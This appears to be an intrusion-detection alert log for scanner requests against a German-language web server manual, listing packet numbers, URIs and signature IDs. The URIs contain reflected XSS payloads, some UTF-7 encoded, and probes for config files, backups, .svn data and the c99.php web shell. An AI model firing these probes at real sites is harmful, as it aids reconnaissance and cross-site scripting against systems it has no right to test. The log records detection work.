Packet [822]	Uri [/manual/de/dso.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1045]	Uri [/manual/de/env.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1063]	Uri [/manual/de/expr.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1065]	Uri [/manual/de/faq/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [1066]	Uri [/manual/de/faq/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [1067]	Uri [/manual/de/faq/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [1069]	Uri [/manual/de/faq/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1070]	Uri [/manual/de/faq/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1071]	Uri [/manual/de/faq/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [1072]	Uri [/manual/de/faq/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [1080]	Uri [/manual/de/faq/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1086]	Uri [/manual/de/faq/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [1087]	Uri [/manual/de/faq/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1088]	Uri [/manual/de/faq/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1092]	Uri [/manual/de/faq/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1093]	Uri [/manual/de/faq/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [1106]	Uri [/manual/de/faq/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [1110]	Uri [/manual/de/faq/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [1119]	Uri [/manual/de/filter.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1322]	Uri [/manual/de/glossary.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1324]	Uri [/manual/de/handler.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1327]	Uri [/manual/de/howto/access.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1329]	Uri [/manual/de/howto/auth.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1331]	Uri [/manual/de/howto/cgi.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1333]	Uri [/manual/de/howto/htaccess.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1338]	Uri [/manual/de/howto/public_html.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1340]	Uri [/manual/de/howto/ssi.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1345]	Uri [/manual/de/httpd.conf]	Nattacks [1]	Signatures	[300001517]
Packet [1350]	Uri [/manual/de/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [1351]	Uri [/manual/de/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1352]	Uri [/manual/de/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1356]	Uri [/manual/de/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1357]	Uri [/manual/de/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [1363]	Uri [/manual/de/install.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1365]	Uri [/manual/de/invoking.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1558]	Uri [/manual/de/license.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1560]	Uri [/manual/de/logs.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1562]	Uri [/manual/de/misc/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [1563]	Uri [/manual/de/misc/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [1564]	Uri [/manual/de/misc/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [1566]	Uri [/manual/de/misc/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1567]	Uri [/manual/de/misc/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1568]	Uri [/manual/de/misc/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [1569]	Uri [/manual/de/misc/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [1577]	Uri [/manual/de/misc/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1584]	Uri [/manual/de/misc/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [1585]	Uri [/manual/de/misc/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1586]	Uri [/manual/de/misc/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1590]	Uri [/manual/de/misc/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1591]	Uri [/manual/de/misc/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [1598]	Uri [/manual/de/misc/password_encryptions.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1600]	Uri [/manual/de/misc/perf-tuning.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1605]	Uri [/manual/de/misc/relevant_standards.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1607]	Uri [/manual/de/misc/security_tips.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1614]	Uri [/manual/de/misc/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [1618]	Uri [/manual/de/misc/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [1627]	Uri [/manual/de/mod/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [1629]	Uri [/manual/de/mod/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [1630]	Uri [/manual/de/mod/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [1632]	Uri [/manual/de/mod/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1633]	Uri [/manual/de/mod/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1634]	Uri [/manual/de/mod/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [1636]	Uri [/manual/de/mod/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [1639]	Uri [/manual/de/mod/core.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1647]	Uri [/manual/de/mod/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1652]	Uri [/manual/de/mod/directive-dict.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1654]	Uri [/manual/de/mod/directives.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1660]	Uri [/manual/de/mod/event.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1666]	Uri [/manual/de/mod/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [1667]	Uri [/manual/de/mod/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1668]	Uri [/manual/de/mod/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1672]	Uri [/manual/de/mod/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1673]	Uri [/manual/de/mod/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [1681]	Uri [/manual/de/mod/module-dict.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1684]	Uri [/manual/de/mod/mod_access_compat.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1686]	Uri [/manual/de/mod/mod_actions.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1688]	Uri [/manual/de/mod/mod_alias.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1690]	Uri [/manual/de/mod/mod_allowmethods.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1692]	Uri [/manual/de/mod/mod_asis.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1695]	Uri [/manual/de/mod/mod_authnz_ldap.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1697]	Uri [/manual/de/mod/mod_authn_anon.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1700]	Uri [/manual/de/mod/mod_authn_core.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1702]	Uri [/manual/de/mod/mod_authn_dbd.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1704]	Uri [/manual/de/mod/mod_authn_dbm.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1707]	Uri [/manual/de/mod/mod_authn_file.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1709]	Uri [/manual/de/mod/mod_authn_socache.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1711]	Uri [/manual/de/mod/mod_authz_core.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1713]	Uri [/manual/de/mod/mod_authz_dbd.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1715]	Uri [/manual/de/mod/mod_authz_dbm.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1717]	Uri [/manual/de/mod/mod_authz_groupfile.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1719]	Uri [/manual/de/mod/mod_authz_host.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1721]	Uri [/manual/de/mod/mod_authz_owner.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1723]	Uri [/manual/de/mod/mod_authz_user.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1725]	Uri [/manual/de/mod/mod_auth_basic.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1728]	Uri [/manual/de/mod/mod_auth_digest.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1730]	Uri [/manual/de/mod/mod_auth_form.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1733]	Uri [/manual/de/mod/mod_autoindex.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1735]	Uri [/manual/de/mod/mod_buffer.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1737]	Uri [/manual/de/mod/mod_cache.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1739]	Uri [/manual/de/mod/mod_cache_disk.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1741]	Uri [/manual/de/mod/mod_cache_socache.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1743]	Uri [/manual/de/mod/mod_cern_meta.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1746]	Uri [/manual/de/mod/mod_cgi.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1748]	Uri [/manual/de/mod/mod_cgid.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1750]	Uri [/manual/de/mod/mod_charset_lite.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1752]	Uri [/manual/de/mod/mod_data.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1754]	Uri [/manual/de/mod/mod_dav.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1756]	Uri [/manual/de/mod/mod_dav_fs.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1758]	Uri [/manual/de/mod/mod_dav_lock.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1760]	Uri [/manual/de/mod/mod_dbd.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1762]	Uri [/manual/de/mod/mod_deflate.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1764]	Uri [/manual/de/mod/mod_dialup.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1766]	Uri [/manual/de/mod/mod_dir.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1768]	Uri [/manual/de/mod/mod_dumpio.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1770]	Uri [/manual/de/mod/mod_echo.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1772]	Uri [/manual/de/mod/mod_env.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1774]	Uri [/manual/de/mod/mod_example.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1778]	Uri [/manual/de/mod/mod_expires.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1780]	Uri [/manual/de/mod/mod_ext_filter.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1782]	Uri [/manual/de/mod/mod_file_cache.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1784]	Uri [/manual/de/mod/mod_filter.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1787]	Uri [/manual/de/mod/mod_headers.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1789]	Uri [/manual/de/mod/mod_heartbeat.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1791]	Uri [/manual/de/mod/mod_heartmonitor.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1793]	Uri [/manual/de/mod/mod_ident.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1795]	Uri [/manual/de/mod/mod_imagemap.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1797]	Uri [/manual/de/mod/mod_include.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1799]	Uri [/manual/de/mod/mod_info.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1801]	Uri [/manual/de/mod/mod_isapi.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1803]	Uri [/manual/de/mod/mod_lbmethod_bybusyness.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1805]	Uri [/manual/de/mod/mod_lbmethod_byrequests.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1807]	Uri [/manual/de/mod/mod_lbmethod_bytraffic.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1809]	Uri [/manual/de/mod/mod_lbmethod_heartbeat.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1811]	Uri [/manual/de/mod/mod_ldap.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1813]	Uri [/manual/de/mod/mod_logio.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1815]	Uri [/manual/de/mod/mod_log_config.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1817]	Uri [/manual/de/mod/mod_log_debug.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1819]	Uri [/manual/de/mod/mod_log_forensic.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1822]	Uri [/manual/de/mod/mod_lua.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1824]	Uri [/manual/de/mod/mod_macro.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1826]	Uri [/manual/de/mod/mod_mime.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1828]	Uri [/manual/de/mod/mod_mime_magic.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1830]	Uri [/manual/de/mod/mod_negotiation.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1833]	Uri [/manual/de/mod/mod_nw_ssl.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1836]	Uri [/manual/de/mod/mod_privileges.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1838]	Uri [/manual/de/mod/mod_proxy.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1840]	Uri [/manual/de/mod/mod_proxy_ajp.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1842]	Uri [/manual/de/mod/mod_proxy_balancer.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1844]	Uri [/manual/de/mod/mod_proxy_connect.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1846]	Uri [/manual/de/mod/mod_proxy_express.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1848]	Uri [/manual/de/mod/mod_proxy_fcgi.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1850]	Uri [/manual/de/mod/mod_proxy_fdpass.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1852]	Uri [/manual/de/mod/mod_proxy_ftp.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1854]	Uri [/manual/de/mod/mod_proxy_html.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1856]	Uri [/manual/de/mod/mod_proxy_http.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1858]	Uri [/manual/de/mod/mod_proxy_scgi.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1860]	Uri [/manual/de/mod/mod_proxy_wstunnel.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1862]	Uri [/manual/de/mod/mod_ratelimit.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1864]	Uri [/manual/de/mod/mod_reflector.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1866]	Uri [/manual/de/mod/mod_remoteip.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1868]	Uri [/manual/de/mod/mod_reqtimeout.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1870]	Uri [/manual/de/mod/mod_request.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1872]	Uri [/manual/de/mod/mod_rewrite.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1874]	Uri [/manual/de/mod/mod_sed.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1876]	Uri [/manual/de/mod/mod_session.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1878]	Uri [/manual/de/mod/mod_session_cookie.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1880]	Uri [/manual/de/mod/mod_session_crypto.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1882]	Uri [/manual/de/mod/mod_session_dbd.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1885]	Uri [/manual/de/mod/mod_setenvif.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1887]	Uri [/manual/de/mod/mod_slotmem_plain.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1889]	Uri [/manual/de/mod/mod_slotmem_shm.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1891]	Uri [/manual/de/mod/mod_so.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1893]	Uri [/manual/de/mod/mod_socache_dbm.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1895]	Uri [/manual/de/mod/mod_socache_dc.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1897]	Uri [/manual/de/mod/mod_socache_memcache.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1899]	Uri [/manual/de/mod/mod_socache_shmcb.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1901]	Uri [/manual/de/mod/mod_speling.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1903]	Uri [/manual/de/mod/mod_ssl.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1905]	Uri [/manual/de/mod/mod_status.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1907]	Uri [/manual/de/mod/mod_substitute.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1909]	Uri [/manual/de/mod/mod_suexec.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1911]	Uri [/manual/de/mod/mod_unique_id.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1913]	Uri [/manual/de/mod/mod_unixd.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1916]	Uri [/manual/de/mod/mod_usertrack.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1918]	Uri [/manual/de/mod/mod_version.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1920]	Uri [/manual/de/mod/mod_vhost_alias.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1922]	Uri [/manual/de/mod/mod_watchdog.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1924]	Uri [/manual/de/mod/mod_xml2enc.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1926]	Uri [/manual/de/mod/mpmt_os2.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1928]	Uri [/manual/de/mod/mpm_common.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1930]	Uri [/manual/de/mod/mpm_netware.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1932]	Uri [/manual/de/mod/mpm_winnt.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1936]	Uri [/manual/de/mod/prefork.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1938]	Uri [/manual/de/mod/quickreference.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1950]	Uri [/manual/de/mod/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [1953]	Uri [/manual/de/mod/worker.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1958]	Uri [/manual/de/mod/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [1969]	Uri [/manual/de/mpm.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1971]	Uri [/manual/de/new_features_2_0.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1973]	Uri [/manual/de/new_features_2_2.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1975]	Uri [/manual/de/new_features_2_4.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [1978]	Uri [/manual/de/platform/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [1979]	Uri [/manual/de/platform/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [1980]	Uri [/manual/de/platform/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [1982]	Uri [/manual/de/platform/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1983]	Uri [/manual/de/platform/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1984]	Uri [/manual/de/platform/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [1985]	Uri [/manual/de/platform/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [1993]	Uri [/manual/de/platform/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1998]	Uri [/manual/de/platform/ebcdic.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2002]	Uri [/manual/de/platform/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [2003]	Uri [/manual/de/platform/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2004]	Uri [/manual/de/platform/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [2008]	Uri [/manual/de/platform/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2009]	Uri [/manual/de/platform/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [2015]	Uri [/manual/de/platform/netware.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2018]	Uri [/manual/de/platform/perf-hp.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2023]	Uri [/manual/de/platform/rpm.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2030]	Uri [/manual/de/platform/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [2033]	Uri [/manual/de/platform/windows.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2035]	Uri [/manual/de/platform/win_compiling.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2038]	Uri [/manual/de/platform/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [2047]	Uri [/manual/de/programs/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [2048]	Uri [/manual/de/programs/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [2049]	Uri [/manual/de/programs/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [2051]	Uri [/manual/de/programs/ab.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2053]	Uri [/manual/de/programs/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2054]	Uri [/manual/de/programs/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [2055]	Uri [/manual/de/programs/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [2057]	Uri [/manual/de/programs/apachectl.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2059]	Uri [/manual/de/programs/apxs.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2060]	Uri [/manual/de/programs/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [2062]	Uri [/manual/de/programs/configure.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2066]	Uri [/manual/de/programs/dbmmanage.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2072]	Uri [/manual/de/programs/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2077]	Uri [/manual/de/programs/fcgistarter.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2079]	Uri [/manual/de/programs/htcacheclean.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2081]	Uri [/manual/de/programs/htdbm.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2083]	Uri [/manual/de/programs/htdigest.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2085]	Uri [/manual/de/programs/htpasswd.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2088]	Uri [/manual/de/programs/httpd.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2090]	Uri [/manual/de/programs/httxt2dbm.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [2093]	Uri [/manual/de/programs/index.bak]	Nattacks [1]	Signatures	[300001927]
